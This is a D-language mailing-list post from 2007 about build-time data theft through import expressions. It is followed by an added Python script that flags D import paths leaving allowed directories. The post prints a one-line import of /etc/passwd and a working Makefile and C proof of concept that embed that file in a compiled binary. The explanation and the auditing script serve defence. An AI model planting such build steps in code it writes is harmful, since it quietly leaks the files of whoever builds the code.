DMD 1.005 release [security concerns about ImportExpressions]
Yauheni Akhotnikau
eao197 at intervale.ru
Tue Feb 13 02:39:22 PST 2007
On Wed, 07 Feb 2007 09:30:31 +0300, Vladimir Panteleev
<thecybershadow at gmail.com> wrote:
> On Tue, 06 Feb 2007 06:54:18 +0200, Walter Bright
> <newshound at digitalmars.com> wrote:
>
>> http://www.digitalmars.com/d/changelog.html
>
> Hmm. What would prevent someone from writing programs like:
> writef(import("/etc/passwd"));
> and trick someone to compile this program for them (under the pretext
> that they don't have a D compiler, for example) to steal the user list
> (or the contents of any other file with a known absolute or relative
> path on the victim's system)?
I don't think that prevention of including some private data during
compilation is a task of the D compiler. That private data can be stolen even
without the new import expression -- it is only necessary to have ordinary Unix
utilities and make available. Consider the following sample:
=== Makefile ===
grab_password: grab_password.c
	gcc -o grab_password grab_password.c

grab_password.c: file_content.h

# Turn /etc/passwd into a C string literal: every uuencoded line gets its
# backslashes and double quotes escaped and ends in "\n\", so the literal
# continues on the following line until the closing '";'.
file_content.h: Makefile
	echo 'const char file_content[] = "\' > file_content.h
	uuencode /etc/passwd password-info | sed 's/\\/\\\\/g' | sed 's/"/\\"/g' \
	| sed 's/^\(.*\)/\1\\n\\/' >> file_content.h
	echo '";' >> file_content.h
=== grab_password.c ===
#include <stdio.h>
#include "file_content.h"   /* generated by the Makefile at build time */

int main(void)
{
    /* The uuencoded /etc/passwd is baked into the binary as a string. */
    printf("file content is: %s\n", file_content);
    return 0;
}
If someone sent these two files to you and asked you to compile them and return
the result, you would send your password without knowing about it.
And things are yet more interesting -- many projects use build tools that are
built on top of dynamic languages (SCons uses Python, Rake and Mxx_ru use
Ruby, MPC (from ACE) uses Perl for generating makefiles, OpenSSL uses Perl
for configuration (at least on the MSWin platform)). In such a situation the
build script can grab whatever it wants without telling you a word.
--
Regards,
Yauheni Akhotnikau
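The exchange above is about what a compiler or build step may read from disk on
the machine that builds the code. One defensive check a reviewer of contributed
D source can run before compiling it is to list every string import expression
(import("file")) and reject literal paths that resolve outside the directories
the build is meant to read from. The script below is an added example, not code
from this thread or from the DMD project; the function names, the idea of an
explicit list of allowed roots, and the sample D module are assumptions made
for illustration. It does pure path arithmetic and never touches the
filesystem, so symlinks inside an allowed root that point elsewhere are out of
its scope.

```python
import posixpath
import re

# Matches a D string import expression with a literal double-quoted argument,
# e.g. import("/etc/passwd"). Module imports (import std.stdio;) have no
# parenthesised string and therefore do not match.
IMPORT_EXPR = re.compile(r'\bimport\s*\(\s*"([^"\\]*(?:\\.[^"\\]*)*)"\s*\)')


def find_import_expressions(source):
    """Yield (line_number, literal_path) for each string import expression.

    Only literal paths are recognised; an argument built from another
    compile-time expression (import(name)) is invisible to this scan and
    should be treated as "unknown" by the caller.
    """
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in IMPORT_EXPR.finditer(line):
            yield lineno, match.group(1)


def escapes_tree(path, allowed_roots):
    """True if `path`, resolved against every allowed root, lands outside all of them.

    POSIX path rules only, no filesystem access. Roots must be absolute.
    """
    for root in allowed_roots:
        if not posixpath.isabs(root):
            raise ValueError("allowed roots must be absolute: %r" % root)
        root = posixpath.normpath(root)
        # join() drops `root` entirely when `path` is absolute, so
        # "/etc/passwd" stays "/etc/passwd"; normpath() collapses "../".
        resolved = posixpath.normpath(posixpath.join(root, path))
        # commonpath() compares whole components, so "/proj2/x" is not
        # mistaken for something under "/proj".
        if posixpath.commonpath([root, resolved]) == root:
            return False   # stays under at least one allowed root
    return True


def audit_d_source(source, allowed_roots):
    """Return [(line_number, path, flagged)] for every string import expression."""
    return [(lineno, path, escapes_tree(path, allowed_roots))
            for lineno, path in find_import_expressions(source)]


# Constructed sample module (not from the thread). The first import expression
# is the one Vladimir's message describes; the second is a benign in-tree read;
# the third climbs out of the tree with "..".
SAMPLE_D = (
    "import std.stdio;\n"
    "void main() {\n"
    '    writef(import("/etc/passwd"));\n'
    '    auto banner = import("banner.txt");\n'
    '    auto cfg = import("../secret.cfg");\n'
    "}\n"
)

if __name__ == "__main__":
    # Hypothetical project root; in practice use the checkout directory and
    # whatever extra data directories the build is expected to read.
    for lineno, path, flagged in audit_d_source(SAMPLE_D, ["/home/user/proj"]):
        status = "REJECT (outside allowed roots)" if flagged else "ok"
        print("line %d: import(%r) -> %s" % (lineno, path, status))
```

Run it over each .d file of a contribution before the compiler does; a non-empty
set of flagged lines (or any non-literal import argument) is a reason to build
in a throwaway container rather than on a workstation that holds real data.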